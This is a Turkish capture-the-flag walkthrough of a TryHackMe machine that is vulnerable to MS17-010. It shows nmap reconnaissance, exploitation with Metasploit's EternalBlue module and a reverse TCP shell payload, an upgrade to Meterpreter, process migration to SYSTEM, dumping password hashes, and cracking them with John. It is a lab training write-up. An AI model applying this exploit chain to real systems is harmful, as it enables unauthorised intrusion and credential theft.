Bu makine zamanında tüm dünyayı kasıp kavuran bir zafiyetten faydalanarak sistemlerin ele geçirilmesini işlemektedir.
TryHackMe platformunda makineye ulaşmak için 2 yöntem vardır.
Birincisi bize verilen ovpn ile kali makinemizde sisteme bağlanmak.
Diğer seçenek de platform üzerindeki AttackBox’ ı kullanmak.
Ben makineyi çözerken indirdiğim ovpn ile kali makinemden çözümleri yapacağım.
Makinenin Çözüm Adımları
1. İlk olarak vpn bağlantımızı yapalım o zaman.
Kalide terminalimi açıyorum ve openvpn beratfurkan.ovpn kodunu çalıştırarak vpn bağlantımı sağlıyorum. (beratfurkan.ovpn: İndirdiğim VPN konfigürasyon dosyası)
2. Şimdi ip adresimi kontrol ediyorum.

3. Şimdi artık platform üzerinden makineyi başlatabilirim.

4. Makinem hakkında bilgi toplamak için nmap taramamı çalıştırıyorum

Buradaki parametreleri incelersek;
-n: DNS çözümlemesi yapma demek.
-Pn: Pingleri devre dışı bırakma.
-A: Agresif tarama yap.
-sV: Açık portta çalışan servisin ne olduğunu bulmaya çalışır.-sC ile birlikte kullanılırsa işe yarar.
-sC: -sV ile versiyon tespiti yaparken nmap scriptlerini kullanır.
-p-: 65535 portun hepsini tarar.
En sonda da hedef sistemin ip adresi yani 10.10.132.136
Burada keşif aşamasında makinenin bize sorduğu iki soru var.
İlk soru 1000′ in altında kaç tane port açık Cevap: 3
5. Bir nmap taraması daha yapacağım. Burada başka bir parametre olan –script vuln parametresini kullanarak, zafiyet taraması yaptıracağım.

Böylece 2. cevabımı da almış oldum. Bize bu makine neye karşı savunmasız diyor. Cevap: ms17-010
6. Makineye sızmak için msfconsole’ u kullanacağım.
İlk olarak msfconsole’ u başlatıp ms17-010 zafiyetini aratarak başlıyorum.

7. Bize kullanacağımız exploit’ in tam yolunu soruyor. Cevap: exploit/windows/smb/ms17_010_eternalblue
8. O zaman exploit’ imi seçerek başlıyorum

Bize sorduğu soru hangi parametreyi ayarlayacağız. Cevap: set RHOSTS 10.10.112.136 yani RHOSTS
Bu arada mecbur set LHOST 10.9.13.197 girmemiz lazım. Çünkü otomatik olarak normal nat network ip adresimi çekti.
9. Payload olarak platform bize set payload windows/x64/shell/reverse_tcp bunu kullan diyor. Biz yine de show payloads diyerek kullanabileceğimiz payloadları görüntüleyelim. Burada kullanabileceğimiz 72 tane payload olduğunu gösteriyor. Biz platformun bize önerdiği payload’ ı kullanarak devam edelim.
10. Artık tüm her şey hazır run diyerek saldırımı başlatıyorum.
11. Kali linux makinemde bir sorun yaşadığım için bu aşamadan sonra platformun bana verdiği AttackBox’ ı kullanacağım. Bu aşamaya kadar olan her şeyi yaptım ve en son run demiştik ve session almış oldum.

12. ctrl+z tuş kombinasyonu ile aktif olan oturumu arka plana alabiliriz. Exploit sayesinde eriştiğimiz hedefte istediklerimizi yapabilmek ve daha ayrıcalıklı bir kullanıcı (Linux için root, Windows için Administrator) olabilmek için meşhur Meterpreter payloadını kullanacağız. Bunun için use post/multi/manage/shell_to_meterpreter komutunu kullanıyoruz.
13. show options diyorum.
sessions diyerek oturumları görüntülüyorum.
set session 1 diyerek oturumumu ayarlıyorum.
Tekrar run diyorum
Bir süre sonra enter a bastıktan sonra tekrar sessions diyorum.
2 tane session var artık yani benim ayarladığım meterpretter session.
session -i 2 diyerek artık meterpreter session’ a geçmiş oluyorum.

14. Sistemde çalışan proses’ leri görmek için ps komutunu kullanıyorum.
Sistem düzeyinde ayrıcalıklı olmak yetmeyebilir. Bu nedenle ayrıcalıklı izinlere (burada SYSTEM) sahip bir prosesi taşımamız gerekiyor.

15. Artık hash’ leri alabiliriz.
Bunun için hashdump kullanacaz.

16. Jon kullanıcısının şifresini bulalım. Bunun için masaüstüne bir dosya açıp içine hash değerinin belli kısmını yapıştırıyorum

17. John ile hash’ i kırmayı deneyecem.

18. Artık bayrakları bulmaya başlayalım.
ilk bayrak C:\ de

19. Diğer 2 bayrağı da arayarak bulalım. Meterpreter de arama komutu search’ dir

20. O zaman ikinci bayrağı da alalım.

21. Son bayrağı da bulalım.

Sızma testi alanında eğitimler alarak kendinizi ya da kurum personellerinizi geliştirmek istiyorsanız bizimle iletişime geçebilirsiniz.
Diğer CTF çözümlerinde görüşmek üzere. Bizi takip etmeye devam edin…

